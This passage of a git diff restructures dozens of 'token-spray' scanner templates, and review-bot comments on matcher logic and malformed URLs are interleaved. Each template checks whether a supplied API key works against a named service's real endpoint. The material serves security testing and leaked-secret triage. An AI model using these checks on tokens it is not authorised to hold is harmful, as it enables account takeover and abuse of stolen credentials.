token-spray/google-autocomplete.yaml | 2 +-
token-spray/google-customsearch.yaml | 2 +-
token-spray/google-directions.yaml | 2 +-
token-spray/google-elevation.yaml | 2 +-
token-spray/google-fcm.yaml | 2 +-
token-spray/google-findplacefromtext.yaml | 2 +-
token-spray/google-gedistancematrix.yaml | 2 +-
token-spray/google-geocode.yaml | 2 +-
token-spray/google-geolocation.yaml | 9 +++++----
token-spray/google-mapsembed.yaml | 2 +-
token-spray/google-mapsembedadvanced.yaml | 2 +-
token-spray/google-nearbysearch.yaml | 2 +-
token-spray/google-nearestroads.yaml | 2 +-
token-spray/google-placedetails.yaml | 2 +-
token-spray/google-placesphoto.yaml | 2 +-
token-spray/google-playablelocations.yaml | 2 +-
token-spray/google-routetotraveled.yaml | 2 +-
token-spray/google-speedlimit.yaml | 2 +-
token-spray/google-staticmaps.yaml | 2 +-
token-spray/google-streetview.yaml | 2 +-
token-spray/google-timezone.yaml | 2 +-
token-spray/googlet-extsearchplaces.yaml | 4 ++--
token-spray/heroku.yaml | 4 ++--
token-spray/hubspot.yaml | 2 +-
token-spray/instagram.yaml | 2 +-
token-spray/ipstack.yaml | 2 +-
token-spray/iterable.yaml | 2 +-
token-spray/jumpcloud.yaml | 2 +-
token-spray/lokalise.yaml | 2 +-
token-spray/loqate.yaml | 2 +-
token-spray/mailchimp.yaml | 2 +-
token-spray/mailgun.yaml | 2 +-
token-spray/mapbox.yaml | 2 +-
token-spray/nerdgraph.yaml | 2 +-
token-spray/npm.yaml | 2 +-
token-spray/openweather.yaml | 2 +-
token-spray/pagerduty.yaml | 2 +-
token-spray/pendo.yaml | 2 +-
token-spray/pivotaltracker.yaml | 2 +-
token-spray/postmark.yaml | 2 +-
token-spray/sendgrid.yaml | 2 +-
token-spray/slack.yaml | 2 +-
token-spray/sonarcloud.yaml | 2 +-
token-spray/spotify.yaml | 2 +-
token-spray/square.yaml | 2 +-
token-spray/stripe.yaml | 2 +-
token-spray/tinypng.yaml | 2 +-
token-spray/travisci.yaml | 2 +-
token-spray/twitter.yaml | 2 +-
token-spray/visualstudio.yaml | 2 +-
token-spray/wakatime.yaml | 2 +-
token-spray/weglot.yaml | 2 +-
token-spray/youtube.yaml | 5 +++--
63 files changed, 72 insertions(+), 70 deletions(-)
diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml
index 08645bbe99..482dc7bdd9 100644
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
+self-contained: true
requests:
- method: GET
path:
@@ -14,9 +15,8 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
+ negative: true
status:
- 401
- negative: true
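Review bot: The only matcher is a negated `401` status, so every other outcome (a `403`, `429`, `5xx` or a redirect) is reported as a valid Asana token. Moving `negative: true` above `status:` in this hunk does not change that. For a credential-validation template a positive check produces fewer false positives: `status:` with `- 200` and no `negative`, ideally together with a word from the success body. The request block begins outside this hunk, so the endpoint being probed is not visible here.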
diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml
index 86e6784911..17c0d216aa 100644
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
+self-contained: true
requests:
- method: GET
path:
- "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml
index 31eea7a7e7..01c70c7974 100644
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,bitly
+self-contained: true
requests:
- method: GET
path:
- "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml
index c2129bc7dd..350b8edd1b 100644
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml
index f37c091c85..15d86d53fe 100644
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,buttercms
+self-contained: true
requests:
- method: GET
path:
- "https://api.buttercms.com/v2/posts/?auth_token={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml
index 1f2c1f434e..b54a5c8df8 100644
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
X-Token: "{{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml
index 0e1d78ca22..d519f10651 100644
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,circle,circleci
+self-contained: true
requests:
- method: GET
path:
- "https://circleci.com/api/v1.1/me?circle-token={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml
index 96b90b34b1..ab73e7ea0d 100644
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@@ -7,13 +7,13 @@ info:
severity: info
tags: token-spray,deviantart
+self-contained: true
requests:
- method: POST
path:
- "https://www.deviantart.com/api/v1/oauth2/placebo"
body: "access_token={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml
index e1f7bf1625..339837160e 100644
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
+self-contained: true
requests:
- method: POST
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/github.yaml b/token-spray/github.yaml
index 944225f0fe..4722dfe6d3 100644
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Basic {{base64('user:' + token)}}
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml
index d6fee5de42..ae81be1c96 100644
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,autocomplete
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml
index 0a77ff06fb..61af504633 100644
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,search
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml
index 483224144e..97aaf95d6c 100644
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,directions
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml
index a9b2e001c7..31b68e98de 100644
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,elevation
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml
index ebb916fbe5..8ca7a1653f 100644
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
+self-contained: true
requests:
- method: POST
path:
@@ -15,7 +16,6 @@ requests:
Authorization: key={{token}}
Content-Type: application/json
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml
index 0a4a93b767..1fe4c209e8 100644
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,find,text
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml
index 5eaf5abb5d..42987ebfe1 100644
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,distance,matrix
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml
index 21d1ea1781..dbba7431d5 100644
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,geocode
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml
index 07684fe0e1..a322b89967 100644
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@@ -6,20 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
- matchers-condition: and
- self-contained: true
+ matchers-condition: and
matchers:
- type: word
part: body
+ negative: true
words:
- 'error'
- negative: true
+
- type: status
+ negative: true
status:
- 404
- negative: true
diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml
index d7d9c5e05f..f8689ae282 100644
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
- "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml
index 8fd69d623d..171ff4b005 100644
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
- "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml
index d40f6d479c..db0dda7fab 100644
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,search,nearby
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml
index ab8ebf2b98..9551876122 100644
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,roads
+self-contained: true
requests:
- method: GET
path:
- "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml
index 3a9935ba6a..2f6cf7d464 100644
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,place,details
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml
index 88790a68ec..6b6b3cd539 100644
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,places,photo
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml
index e034096bfc..6dce339499 100644
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,playable,locations
+self-contained: true
requests:
- method: GET
path:
- "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml
index 4efb960afd..2c0853eda0 100644
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,route
+self-contained: true
requests:
- method: GET
path:
- "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml
index dd06969472..e5e8290a6a 100644
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,speed,limit
+self-contained: true
requests:
- method: GET
path:
- "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml
index 5011053baf..ba4ee679ca 100644
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,maps
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml
index cc0344919f..d7156a7295 100644
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,streetview
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml
index 33f8002db5..40b13b61ca 100644
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@@ -6,12 +6,12 @@ info:
severity: info
tags: token-spray,google,timezone
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
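Review bot: The request URL in this hunk reads `location=39.6034810,-119.6822510×tamp=1331161200`, which looks like `&timestamp=` after an HTML-entity decode turned `&times` into `×`. If the file itself holds that text, the call goes out without a `timestamp` parameter, and a valid key could be reported as not working; the word matcher is cut off below the hunk, so the exact effect cannot be confirmed from here. Check that the path contains `&timestamp=1331161200&key={{token}}`.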
diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml
index 29e5fcca5a..290da60328 100644
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@@ -6,15 +6,15 @@ info:
severity: info
tags: token-spray,google,search,places,text
+self-contained: true
requests:
- method: GET
path:
- "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
+ negative: true
words:
- 'error_message'
- negative: true
diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml
index ec76722f11..ef81ec91e8 100644
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
+self-contained: true
requests:
- method: POST
path:
@@ -15,12 +16,11 @@ requests:
Accept: application/vnd.heroku+json; version=3
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
+ condition: or
status:
- 200
- 201
- 202
- 206
- condition: or
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml
index b1a796d113..da95a4b12a 100644
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@@ -7,13 +7,13 @@ info:
severity: info
tags: token-spray,hubspot
+self-contained: true
requests:
- method: GET
path:
- "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
- "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml
index 8ab1b9131d..dd851bee3e 100644
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,instagram,graph
+self-contained: true
requests:
- method: GET
path:
- "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml
index 4c912bf0b7..ac527d2a1e 100644
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,ipstack
+self-contained: true
requests:
- method: GET
path:
- "https://api.ipstack.com/8.8.8.8?access_key={{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index a4d77e7575..69da55de5d 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Api_Key: "{{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml
index cdfbdba931..dbf3c9ab35 100644
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
X-Api-Key: "{{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml
index 5ca1351c6d..5003f25b31 100644
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
X-Api-Token: "{{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml
index 2cbb1f4e69..dcbf5b156d 100644
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,loqate
+self-contained: true
requests:
- method: GET
path:
- "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
- self-contained: true
matchers:
- type: word
part: body
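Review bot: The `path` entry `api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}...` has no scheme, while every other HTTP token-spray template in this commit uses an absolute `https://` URL. With `self-contained: true` there is no target URL to complete it, so the request is likely malformed. If the engine applies a default scheme, `{{token}}` could also go out over plain HTTP; this is inferred, since the engine's handling is not shown here. Start the line with `https://api.addressy.com/`.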
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml
index 840ab656f4..d25870e279 100644
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
+self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
@@ -14,7 +15,6 @@ network:
host:
- "tls://smtp.mandrillapp.com:465"
- self-contained: true
matchers:
- type: word
words:
diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml
index 67d7c356bd..c4997aaaa4 100644
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Basic {{base64('api:' + token)}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml
index 5e68a1ec4b..1e246f783b 100644
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,mapbox
+self-contained: true
requests:
- method: GET
path:
- "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml
index a0b6cddb77..ca570964e4 100644
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
+self-contained: true
requests:
- method: POST
path:
@@ -16,7 +17,6 @@ requests:
API-Key: "{{token}}"
body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml
index 6105c678db..fb0ef0b6b7 100644
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml
index 4c32828a44..916936aa97 100644
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,weather,openweather
+self-contained: true
requests:
- method: GET
path:
- "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml
index 48756e267e..bad59948ed 100644
--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
+self-contained: true
requests:
- method: GET
path:
@@ -15,7 +16,6 @@ requests:
Accept: application/vnd.pagerduty+json;version=2
Authorization: Token token={{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml
index 5a46a542a8..66cd885dc6 100644
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
+self-contained: true
requests:
- method: GET
path:
@@ -16,7 +17,6 @@ requests:
Content-Type: application/json
X-Pendo-Integration-Key: "{{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml
index 29e6e32c56..d7a74ded66 100644
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
X-TrackerToken: "{{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml
index 72480a7efc..85367b5c61 100644
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
+self-contained: true
requests:
- method: GET
path:
@@ -15,7 +16,6 @@ requests:
Accept: application/json
X-Postmark-Server-Token: "{{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml
index b84a41a488..d9330371f1 100644
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
+self-contained: true
network:
- inputs:
- data: "ehlo\r\n"
@@ -16,7 +17,6 @@ network:
host:
- "tls://smtp.sendgrid.net:465"
- self-contained: true
matchers:
- type: word
words:
diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml
index e9e2a0af1e..8203aa56b5 100644
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
+self-contained: true
requests:
- method: POST
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml
index 9ca1db987c..aed9d1760f 100644
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Basic {{base64(token + ':')}}
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml
index 7cb306b924..01f1d80084 100644
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/square.yaml b/token-spray/square.yaml
index 2a5f7210fb..7ccb835189 100644
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
+self-contained: true
requests:
- method: GET
path:
@@ -16,7 +17,6 @@ requests:
Content-Type: application/json
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml
index 15dd931744..50e8979aa7 100644
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,stripe
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Basic {{base64(token + ':')}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml
